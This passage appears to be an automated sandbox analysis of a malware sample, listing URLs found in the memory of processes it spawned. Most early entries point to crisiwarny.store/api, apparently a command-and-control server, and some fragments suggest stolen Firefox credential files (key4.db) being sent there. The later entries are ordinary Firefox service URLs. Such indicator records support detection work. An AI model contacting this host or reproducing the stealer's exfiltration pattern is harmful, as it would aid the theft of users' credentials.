Source: e192e43b61.exe, 0000000A.00000003.2658045895.0000000001190000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/(
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/.B64
Source: e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store//
Source: e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2936438339.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/1
Source: file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/?
Source: e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/A
Source: e192e43b61.exe, 0000000D.00000003.2908880792.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/B
Source: e192e43b61.exe, 0000000B.00000003.2883813497.000000000145F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/G
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/HEFM
Source: e192e43b61.exe, 0000000A.00000003.2606262886.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2623816326.0000000001193000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608822442.0000000001193000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2623503748.000000000118F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/I
Source: e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/P
Source: e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/PW
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/R
Source: e192e43b61.exe, 0000000A.00000003.2898981302.0000000001187000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/T
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/Y
Source: e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiF9
Source: e192e43b61.exe, 0000000D.00000002.3031046367.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiP
Source: e192e43b61.exe, 0000000B.00000002.3032149823.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiS
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiT
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2843716285.000000000146A000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883708790.000000000146A000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.0000000001135000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apibu
Source: e192e43b61.exe, 0000000D.00000003.2806047135.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apibuE
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apibue
Source: e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apig
Source: file.exe, 00000000.00000003.1872949607.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001780000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apig9x
Source: file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apipd
Source: file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apire1
Source: file.exe, 00000000.00000003.1872949607.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800032678.0000000001782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804018008.0000000001782000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apis
Source: file.exe, 00000000.00000003.1800032678.0000000001782000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apis9x
Source: e192e43b61.exe, 0000000D.00000003.2908880792.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2914261433.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apit
Source: file.exe, 00000000.00000003.1804018008.000000000177C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004277314.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1799770952.000000000177C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/e-
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/em
Source: e192e43b61.exe, 0000000D.00000003.2883370297.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/hi39
Source: e192e43b61.exe, 0000000D.00000003.2792073053.000000000111B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/i
Source: e192e43b61.exe, 0000000B.00000003.2755425004.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/lB
Source: e192e43b61.exe, 0000000D.00000003.2908880792.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/r
Source: e192e43b61.exe, 0000000D.00000003.2883370297.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/rdVPr
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004277314.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2898981302.0000000001187000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/s
Source: e192e43b61.exe, 0000000A.00000003.2658045895.0000000001190000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2639716464.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640641696.000000000118F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/y
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/api
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/api2o4p.default-release/key4.dbPK
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/api=
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/apiF
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/apin.txtPK
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/apiw
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsTim
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3011870817.000037E83F604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3012022176.000037F743104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjshttp://compose
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001D.00000002.2976416417.000001E75FE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsasyncEmitManifestEntry(
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881C:
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001D.00000002.2964932071.000001E75E67D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
